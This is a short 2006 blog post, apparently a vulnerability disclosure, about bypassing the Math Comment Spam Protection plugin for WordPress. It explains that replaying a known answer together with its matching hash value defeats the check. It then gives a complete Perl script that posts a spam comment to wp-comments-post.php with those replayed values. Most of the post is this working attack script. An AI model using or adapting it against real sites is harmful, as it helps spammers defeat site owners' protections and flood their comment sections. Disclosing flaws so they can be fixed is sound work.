Friday, July 07, 2006

Math Comment Spam Protection Plugin - by-pass

wordpress plugin against spam (@ Michael Woehrer)
-> http://sw-guide.de/wordpress/math-comment-spam-protection-plugin/

easy to by-pass you must only send $mathuseranswer + $mathresult with any validate value.


#!/usr/bin/perl -w

use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use strict;

# mathuseranswer 9+5 14
# mathresult 59568733


my $url = 'http://localhost/wordpress/wp-comments-post.php';

my $req = POST $url,
[
comment_post_ID => '3',
author => 'spam',
email => 'more\@spam.com',
comment => 'spammm2',
mathuseranswer => '14',
mathresult => '59568733'
];

print "HTTP-FullRequest-Header: \n";
print $req->headers->as_string() , "\n";

print "HTTP-FullRequest-Header-Content: \n";
print $req->content() ,"\n";


my $ua = LWP::UserAgent->new();

my $response = $ua->request($req);

if ( $response->is_error() ) {
print "Error-Code : ", $response->code() , "\n";
print "Fehlermeldung: ", $response->message() , "\n";
}
else {
print $response->content() , "\n";
}